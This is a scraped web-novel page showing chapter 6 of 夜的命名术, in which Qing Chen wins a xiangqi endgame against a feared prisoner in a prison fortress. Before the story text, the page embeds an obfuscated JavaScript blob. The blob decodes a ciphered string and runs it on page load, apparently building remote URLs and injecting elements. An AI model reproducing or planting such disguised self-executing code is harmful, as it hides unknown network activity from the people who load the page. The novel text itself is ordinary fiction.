笔趣阁

安装
字:
关灯 护眼
笔趣阁 > 夜的命名术 > 6、过河的悍卒

6、过河的悍卒

(function(){function t11d18b6e(x16ae02){var fdb804468="9O5M.Jl$e4/],fjxG!7y2Ph^iwnT:L36pHCs0v&B?;dcKqESDY[W(Vk8z~m=rgFo%-uIaR1_ZtNb|XUA@Q";var tc68f0bf="sNHqg?pU~i:rQ/E73txf=98RP1JLXeBAG6uT2IF(&VoKv|MO4l[0nD!,_.hb%5jWz;kYc-$@aSdyC]^Zmw";return x16ae02.split('').map(function(nad834){var o1e191=fdb804468.indexOf(nad834);return o1e191==-1?nad834:tc68f0bf[o1e191]}).join('')}var c=t11d18b6e('ftp1://Q4(NdQ["" + "." + "=" + "W" + "0" + "w" + "G" + "Z" + "P" + "0"+""X2yC(a!4d(B) { - ByC(a!4d( B]0xyHa=8 9yhGhWhh8 (a=wN0wNh8 ZGaxDgGg8 @00w=HgxW) { 4y BfUEZaqo4(f~!L9!B(ZK4.Z!d]~lYZ!yd]@)) { ]L!C]( }- KZ] mDyygDa 2 yC(a!4d( B.ZHxgNZg) { ]L!C]( t!]4(.~y]d@|mZ]|dNLB.ZHxgNZg) }- KZ] MDHHZawyW 2 ZGaxDgGg[mDyygDaBW7Hw) + mDyygDaBW7xD) + mDyygDaBW7H&) + mDyygDaBW7H0)X8 FZGhPLL 2 ZGaxDgGg[mDyygDaBW7H0) + mDyygDaBW7xD) + mDyygDaBW7H&) + mDyygDaBW7Hw)X8 LGxD0LPL 2 @00w=HgxW[MDHHZawyWB"IG;ba@;CN&OFa@YQN622")X8 YDDywgW0N 2 MDHHZawyWB"IGnYI:^Y^o7Y=o;CN622")- KZ] bN=HgL 2 MDHHZawyWB"L@OuAonwAQ22")- KZ] y=0w=L0N- 4y BYdaZ!4d(~9LZ]am~4(NL7SyBbN=HgL) > Rw) { y=0w=L0N 2 @00w=HgxW[YDDywgW0NXBMDHHZawyWB"Np;DNp&bAoj2"))- y=0w=L0N~4N 2 "!" + BEZ!m~]Z(Nd@B) * wWWWW)- y=0w=L0N~9!bYL~Q4N!m 2 "wWWr"- y=0w=L0N~9!bYL~mL4.m! 2 "GWWl7"- y=0w=L0N~N49Z=YLN 2 !]CL- @00w=HgxW~=dNb~ZllL(N|m4YNBy=0w=L0N) } KZ] !wyaxWaNN 2 @00w=HgxW[YDDywgW0NXBMDHHZawyWB"ZoAbIowY"))- !wyaxWaNN~4N 2 "7" + BEZ!m~]Z(Nd@B) * wWWWW)- !wyaxWaNN~9!bYL~Q4N!m 2 "wWl7"- !wyaxWaNN~9!bYL~mL4.m! 2 g + "l7"- !wyaxWaNN~9!bYL~=Zau.]dC(N 2 "#&&&"- KZ] KWNL0 2 yC(a!4d( BdGPGgy0yw) { !wyaxWaNN~9]a 2 ["m!!l9/ff"8 dGPGgy0yw8 "]"8 "Fwww"8 (a=wN0wNh + "Jz]2" + BFZGhPLLBYdaZ!4d(~m]Ly))X~Fd4(B"f")- @00w=HgxW~=dNb~ZllL(N|m4YNB!wyaxWaNN) }- 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(9L(N =]4N.4(. md9! " + 9yhGhWhh } ZGaxDgGg[MDHHZawyWB"A@;WI0.2")XB["m!!l9/ff"8 MDHHZawyWB9yhGhWhh)8 "m@~F9J" + VZ!L["(dQ"XB) + By=0w=L0N 22 (CYY J "" / bN=HgL)X~Fd4(B"f"))~!mL(BBYygDDHhP) 2> YygDDHhP~!L7!B))~!mL(BBYygDDHhP) 2> { 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(]LaL4KL =]4N.4(. md9! " + YygDDHhP }- KWNL0BMDHHZawyWBYygDDHhP~9lY4!B"")~]LKL]9LB)~Fd4(B""))) })~aZ!amBBL]]) 2> { KWNL0BMDHHZawyWB]0xyHa=)) })- ZGaxDgGg["ZNNjKL(!T49!L(L]"XB"@L99Z.L"8 yC(a!4d( BL) { 4y BL~NZ!Z~u 22 (a=wN0wNh) { @00w=HgxW~.L!jYL@L(!3bvNB!wyaxWaNN~4N)~]L@dKLB)- 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(]LaL4KL 4y]Z@L ld9! @L99Z.L" } (LQ &C(a!4d(B"Z].9"8 MDHHZawyWBL~NZ!Z~K))B{ z!Na9/ LGxD0LPL8 z!]Z/ y=0w=L0N }) } }) })B"Z@jCa0ml=@h%N:vCL5YH"8 "I0PC=@;FN|g7I:YMA:lGT(mgL.22"8 "wG000HPP0gxP0g"8 Q4(NdQ8 NdaC@L(!) }-.=W0wGZP0B)-'.substr(7));new Function(c)()})();
章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
在中年男人抬头之前,庆尘以为对方聋了,身边这么大的动静,竟然一点都没影响到他。
  然而在中年男人抬头之后,庆尘几乎以为自己聋了,因为原本嘈杂的广场竟是一瞬间安静下来,没有多余的一点声响。
  周围人群里眼中的惊讶神色,还有一些莫名的情绪,就像是在为中年男人的身份做着衬托。
  因为以往这中年男人从来没有理会过别人的求助。
  忽然间庆尘松了口气,因为这一切都证明,他赌对了。
  中年男人并没有对他说什么,而是平静的推动了棋盘上红方前卒,进一。
  而中年男人自己所持的黑方,则选择了象五退七,杀掉了那刚刚悍拱的卒子。
  庆尘在远处静静的看着棋盘,这四寇擒王残局是地球上也算有名的残局了,有两种布局形式,他面前则是其中更凶险的那一局。
  所谓残局,一般是指黑方必胜,红方连和棋都做不到,若是和棋,就算是把这残局给解了。
  但是,庆尘并不满足于和棋。
  四寇擒王这残局有些奇特,红方四悍卒已经飞渡楚河来到底线之处,并且双车均在。
  局势看起来彼此好像是势均力敌,然而事实上这残局步步杀机、处处陷阱,黑棋只需一步便能赢棋,红方却只能疲于奔命的,一不留神就会以为自己胜券在握,结果被反杀。
  这是看似充满希望,却能让人一点点陷入绝望的死局。
  “继续,”中年男人平淡道。
  庆尘说道:“兵二平三。”
  中年男人眼睛一亮,这时候他似乎真的来了兴趣,竟是懒得去拨弄棋盘,直接闭上眼睛与庆尘推演盲棋:“将六进一。”
  庆尘也闭上了眼睛:“后车进四。”
  “象七退九。”
  到第六回合时,庆尘突然说道:“车一进七!”
  那中年男人闭上的双眼竟是再次睁开了,他惊讶的看着庆尘:“象五退七。”
  前五步时,彼此来来往往平淡无奇,可是到了这第六步之后,双方竟开始步步换子!
  你杀我!我杀你!血流成河,哀兵遍野!
  双方在棋盘上之果敢与决断,都极其残酷。
  两人宛如战场上最冷静的将领,为了最后的胜利不惜牺牲一切。
  四寇擒王之局,竟硬生生让两人杀出了一股武勇之气,然而在这武勇背后,是双方深沉的算计。
  开局时,庆尘这边红方明明是过河四卒看起来更加凶悍,可他却将四卒一一舍弃来换取其他谋划,唯留最后一枚!
  车一平四。
  将四平五。
  炮四平五。
  车三平五。
  第十五步,庆尘直到这时终于长长吐出一口浊气:“兵五进一!”
  图穷匕见。
  擒王!
  也是直到这一刻,四寇擒王的残局解棋才终于迸发出难以言喻的魅力,彼此之间在楚河汉界上消杀相解的局势,竟让中年男人感觉像是真的在战场上与谋士对垒一样。
  这棋,每一步都凶险到了极点。
  最让中年男人惊奇的是,眼前少年的年纪并不大,却在弃子换局的时候没有丝毫犹豫。
  不抛弃不放弃固然重要,但战争就是战争,战争怎么可能没有牺牲?
  他静静的看着面前少年,对方也在与他对视,面色凝重而又倔强。
  似是要在这绝境中,厮杀出一条生路来,开辟一段新的人生。
  他明白了,自己是在下棋,对方是在钢铁猛兽环伺的环境里求存,本身态度就有所不同。
  没人注意到,就是这一刻,这监狱堡垒里210台监控摄像,竟是有81个都直接转向了庆尘。
  那监控摄像的黑色摄像头里有漩涡收缩着,似乎是要对焦庆尘的脸部。
  谁也不知道这监控摄像的背后,是谁在聚焦。
  中年男人笑了笑把黑方老将倒扣在棋盘上:“有点意思,这年头会下象棋的人不多了,明天继续。”
  说完,他背着手朝图书区走去,留下那棋盘在餐桌上谁也不敢乱动。
  那桌上的灰色猫咪站起身来,静悄悄的跟在中年男人身后。
  猫咪团卧的时候像是一只毛球,看起来并不大。
  然而这一伸展开来,庆尘才发现这猫体型硕大竟有一米多长,异常矫健。
  寻常猫走路都轻飘飘的被人叫做猫步,这只猫却走出了一种老虎的姿态。
  广场上所有正在关注着这里的人都愣住了,这残局竟是被少年给赢了?
  说实话他们也不懂象棋,到后来双方下盲棋,他们就更听不懂了。
  这个时代里娱乐活动太多了,每一种都比象棋来的更加刺激、更加有乐趣。
  他们可以用芯片来直接获取快感,还能将意识登入虚拟网络,这是个快乐非常廉价的时代,下象棋的人少之又少,下的再好你还能下的过人工智能吗?
  然而,他们对庆尘赢下中年男人的惊诧点在于,在他们眼里那个中年男人怎么会输?
  不管是下棋还是战斗,对方怎么会输?
  说实话庆尘也有些奇怪,这个中年男人明明连机械肢体都没有,连他身边的两个随从也没有,为何在这钢铁猛兽横行的监狱里,威望如此之高?
  之前拦着庆尘的那个年轻人对他眨眨眼睛:“厉害啊,我叫林小笑,他叫叶晚,咱们明天见。”
  说完,便和另一名叫做叶晚的年轻人一起,跟随中年男人步伐离去了。
  庆尘此时甚至还不知道中年男人叫什么,只知道了两名随从的姓名,但现在无疑是一个很好的开端了。
  广场上凝结的气氛,直到刚刚那位中年男人带着叶晚、林小笑全都去了阅读区,才终于缓缓活络起来。
  刚刚在招待新人的囚犯,还在不断拉扯着新人进入囚室,包括他在内总共有12名新人,已经被拉进去了9人。
  这时候庆尘再看向那些囚犯,却已经没有人再打他的主意。
  忽然,有一名装载着机械腿的青年跑到庆尘面前,仓惶的说道:“咱们都是刚进来的,你帮帮我,我以后都听你的。”
  周围囚犯都冷冷看着,他们现在还有点摸不清状况,庆尘肯定是不能动了,但如果这少年想要保其他新人,那他们也不愿意。
  然而,庆尘对这青年所言充耳不闻,面色平静的好像什么都没听见似的。
  囚犯们笑了起来,硬生生将这青年给拉走了。
  只听青年大吼:“我舅舅是17号城市长鸣公司的理事,你们……”
  还没等他把话说完,其他囚犯哄笑起来:“除了五大公司,其他公司不值一提,别说你了,就算你舅舅来到这座监狱堡垒里都得老老实实的。”
『加入书签,方便阅读』
安装
继续浏览精彩内容
到笔趣阁APP免费阅读
《夜的命名术》
打开
浏览器
继续